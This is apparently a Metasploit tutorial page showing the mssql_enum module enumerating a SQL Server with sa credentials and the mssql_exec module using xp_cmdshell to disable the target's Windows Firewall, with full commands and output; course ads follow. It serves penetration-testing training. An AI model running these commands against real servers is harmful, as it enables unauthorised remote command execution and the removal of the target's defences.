mssql_enum

The mssql_enum is an admin module that will accept a set of credentials and query a MSSQL for various configuration settings.

msf > use auxiliary/admin/mssql/mssql_enum
msf auxiliary(mssql_enum) > show options

Module options (auxiliary/admin/mssql/mssql_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOST                                 yes       The target address
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)

To configure the module, we accept the default username, set our PASSWORD and RHOST, then let it run.

msf auxiliary(mssql_enum) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_enum) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_enum) > run

[*] Running MS SQL Server Enumeration...
[*] Version:
[*]	Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) 
[*]		Oct 14 2005 00:33:37 
[*]		Copyright (c) 1988-2005 Microsoft Corporation
[*]		Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)
[*] Configuration Parameters:
[*] 	C2 Audit Mode is Not Enabled
[*] 	xp_cmdshell is Not Enabled
[*] 	remote access is Enabled
[*] 	allow updates is Not Enabled
[*] 	Database Mail XPs is Not Enabled
[*] 	Ole Automation Procedures are Not Enabled
[*] Databases on the server:
[*] 	Database name:master
[*] 	Database Files for master:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf
[*] 	Database name:tempdb
[*] 	Database Files for tempdb:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\tempdb.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\templog.ldf
[*] 	Database name:model
[*] 	Database Files for model:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\model.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\modellog.ldf
[*] 	Database name:msdb
[*] 	Database Files for msdb:
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\MSDBData.mdf
[*] 		c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\MSDBLog.ldf
[*] System Logins on this Server:
[*] 	sa
[*] 	##MS_SQLResourceSigningCertificate##
[*] 	##MS_SQLReplicationSigningCertificate##
[*] 	##MS_SQLAuthenticatorCertificate##
[*] 	##MS_AgentSigningCertificate##
[*] 	BUILTIN\Administrators
[*] 	NT AUTHORITY\SYSTEM
[*] 	V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] 	BUILTIN\Users
[*] Disabled Accounts:
[*] 	No Disabled Logins Found
[*] No Accounts Policy is set for:
[*] 	All System Accounts have the Windows Account Policy Applied to them.
[*] Password Expiration is not checked for:
[*] 	sa
[*] System Admin Logins on this Server:
[*] 	sa
[*] 	BUILTIN\Administrators
[*] 	NT AUTHORITY\SYSTEM
[*] 	V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] Windows Logins on this Server:
[*] 	NT AUTHORITY\SYSTEM
[*] Windows Groups that can logins on this Server:
[*] 	BUILTIN\Administrators
[*] 	V-MAC-XP\SQLServer2005MSSQLUser$V-MAC-XP$SQLEXPRESS
[*] 	BUILTIN\Users
[*] Accounts with Username and Password being the same:
[*] 	No Account with its password being the same as its username was found.
[*] Accounts with empty password:
[*] 	No Accounts with empty passwords where found.
[*] Stored Procedures with Public Execute Permission found:
[*] 	sp_replsetsyncstatus
[*] 	sp_replcounters
[*] 	sp_replsendtoqueue
[*] 	sp_resyncexecutesql
[*] 	sp_prepexecrpc
[*] 	sp_repltrans
[*] 	sp_xml_preparedocument
[*] 	xp_qv
[*] 	xp_getnetname
[*] 	sp_releaseschemalock
[*] 	sp_refreshview
[*] 	sp_replcmds
[*] 	sp_unprepare
[*] 	sp_resyncprepare
[*] 	sp_createorphan
[*] 	xp_dirtree
[*] 	sp_replwritetovarbin
[*] 	sp_replsetoriginator
[*] 	sp_xml_removedocument
[*] 	sp_repldone
[*] 	sp_reset_connection
[*] 	xp_fileexist
[*] 	xp_fixeddrives
[*] 	sp_getschemalock
[*] 	sp_prepexec
[*] 	xp_revokelogin
[*] 	sp_resyncuniquetable
[*] 	sp_replflush
[*] 	sp_resyncexecute
[*] 	xp_grantlogin
[*] 	sp_droporphans
[*] 	xp_regread
[*] 	sp_getbindtoken
[*] 	sp_replincrementlsn
[*] Instances found on this server:
[*] 	SQLEXPRESS
[*] Default Server Instance SQL Server Service is running under the privilege of:
[*] 	xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf auxiliary(mssql_enum) >

mssql_exec

The mssql_exec admin module takes advantage of the xp_cmdshell stored procedure to execute commands on the remote system. If you have acquired or guessed MSSQL admin credentials, this can be a very useful module.

msf > use auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

   Name                 Current Setting                       Required  Description
   ----                 ---------------                       --------  -----------
   CMD                  cmd.exe /c echo OWNED > C:\owned.exe  no        Command to execute
   PASSWORD                                                   no        The password for the specified username
   RHOST                                                      yes       The target address
   RPORT                1433                                  yes       The target port (TCP)
   TDSENCRYPTION        false                                 yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa                                    no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false                                 yes       Use windows authentification (requires DOMAIN option set)

We set our RHOST and PASSWORD values and set the CMD to disable the Windows Firewall on the remote system. This can enable us to potentially exploit other services running on the target.

msf auxiliary(mssql_exec) > set CMD netsh firewall set opmode disable
CMD => netsh firewall set opmode disable
msf auxiliary(mssql_exec) > set PASSWORD password1
PASSWORD => password1
msf auxiliary(mssql_exec) > set RHOST 192.168.1.195
RHOST => 192.168.1.195
msf auxiliary(mssql_exec) > run

[*] The server may have xp_cmdshell disabled, trying to enable it...
[*] SQL Query: EXEC master..xp_cmdshell 'netsh firewall set opmode disable'



 output
 ------
 Ok.
 
 

[*] Auxiliary module execution completed
msf auxiliary(mssql_exec) >
Menu
X Close

 

Certified Pentesting
Professional

OSCP
course starting at
$800 USD

Take Penetration Testing with Kali Linux to gain invaluable penetration testing skills and earn your OSCP.

  • Self-paced, online course
  • Includes certification exam fee
  • Access innovative virtual labs
  • Hands-on experience
  • Become an OSCP

Certified Pentesting
Expert

OSCE
course starting at
$1200 USD

Take Cracking the Perimeter to take your penetration testing skills to expert levels and earn your OSCE.

  • Self-paced, online course
  • Includes certification exam fee
  • Access innovative virtual labs
  • Hands-on experience
  • Become an OSCE

 

Certified Pentesting
Web Expert

OSWE
course starting at
$1400 USD

Take Advanced Web Attacks and Exploitation, to deep dive into web apps to earn your OSWE.

  • Self-paced, online course
  • Includes certification exam fee
  • Access innovative virtual labs
  • Hands-on experience
  • Become an OSWE

Certified Pentesting
Wireless Professional

OSWP
course starting at
$450 USD

Take Offensive Security Wireless Attacks to acquire knowledge about Wi-Fi attacks and earn your OSWP.

  • Self-paced, online course
  • Includes certification exam fee
  • Access innovative virtual labs
  • Hands-on experience
  • Become an OSWP

Certified Exploitation
Expert

OSEE
course starting at
See
Live Schedule

Take Advanced Windows Exploitation to develop exploits for Windows systems and earn your OSEE.

  • Live training course
  • Includes certification exam fee
  • Maximum instructor interaction
  • Highly challenging
  • Become an OSEE